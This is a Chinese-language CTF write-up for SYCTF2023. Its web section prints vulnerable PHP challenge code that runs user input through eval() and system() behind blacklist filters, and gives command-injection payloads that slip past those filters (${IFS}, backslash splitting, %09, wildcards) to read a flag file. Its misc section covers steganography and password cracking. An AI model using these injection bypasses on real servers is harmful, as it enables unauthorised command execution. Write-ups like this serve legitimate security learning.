RE:SYCTF2023

WEB

签到

image-20250722200458855

rce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
    eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}


?>

简单命令执行

image-20250722200819321

1
/?c=system('tac fl*');

宝宝巴士

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
            echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

过滤数字空格

空格可以使用${IFS}

*被过滤无法正则

使用\隔开命令

1
/?rce=ta\c${IFS}fla\g.php

image-20250722201548749

可以读取,但是未能成功获得flag

最后发现flag在根目录

1
?rce=ta\c${IFS}/fla\g

其他姿势

用uniq,fla?,%09尝试绕过

1
?rce=uniq%09/fla?

登录

考察弱口令

image-20250722203016784

Misc

Misc签到

image-20250723163627719

小鲨鱼

字符串搜索得到flag

image-20250723164252746

oursercet

image-20250723164431438

image-20250723164424025

由题目名联想到可能为oursercet加密,将其放入软件中,输入123456得到flag.txt

image-20250723165344334

steg

压缩包得到一张图片与key.txt

key=李钱李孙李李李周李吴李郑

看官方wp为123456

steghide解密

image-20250723170319164

图片

爆破得到密码

image-20250723170859070

010查看发现IHDR块

补全得到图片

根据官方wp知道考察盲水印

image-20250723171815762